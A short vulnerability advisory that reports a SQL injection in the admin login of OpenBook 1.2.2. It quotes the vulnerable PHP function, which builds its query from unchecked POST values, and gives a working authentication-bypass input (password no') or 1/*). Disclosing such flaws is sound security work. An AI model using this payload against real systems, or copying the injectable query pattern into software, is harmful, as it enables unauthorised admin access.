[SVadvisory] - SQL injection in OpenBook 1.2.2
SVadvisory#12
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: SQl injection
Product: OpenBook
Version: 1.2.2
Site: http://openbook.sourceforge.net/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerabilities
***************
Code:
function auth_user($userid, $password)
{
global $HTTP_POST_VARS;
global $admin_table;
$userid=$HTTP_POST_VARS['userid'];
$password=$HTTP_POST_VARS['password'];
db_connect();
$query="SELECT userid "
."FROM $admin_table "
."WHERE userid='$userid' AND
password=password('$password')";
$result=mysql_query($query);
if(!mysql_num_rows($result))
// no matches
{
return 0;
}
else
// match found so return userid
{
$query_data=mysql_fetch_array($result);
return $query_data['userid'];
}
}// end auth_user()
Variable $userid, $password in admin.php are not checked before premises in SQL
request, because of this possible produce SQL-injection, after which, any user
can gain access to admin panels
Here is idle time example substitutions:
-------------------------------
User ID: admin
Password: no') or 1/*
-------------------------------
Bug Found
*********
------------------------------------------------
Search Vulnerabilities Team - www.svt.nukleon.us
------------------------------------------------